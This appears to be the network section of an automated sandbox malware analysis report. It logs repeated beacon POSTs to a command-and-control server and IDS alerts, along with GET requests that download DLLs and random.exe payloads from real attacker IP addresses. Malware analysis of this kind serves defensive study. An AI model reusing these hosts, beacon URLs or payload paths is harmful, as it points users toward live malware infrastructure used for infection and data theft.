Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49766 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49795 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49813 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49839 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49858 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49882 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49898 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49912 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49935 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49965 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49984 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49997 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50003 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50010 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50022 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50057 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50070 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50084 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50094 -> 104.21.64.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_0057E0C0 recv,recv,recv,recv, 9_2_0057E0C0
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.x7CxCIZpks8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo8czmnaLIncRgBQP7N2THncpDJ9mQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
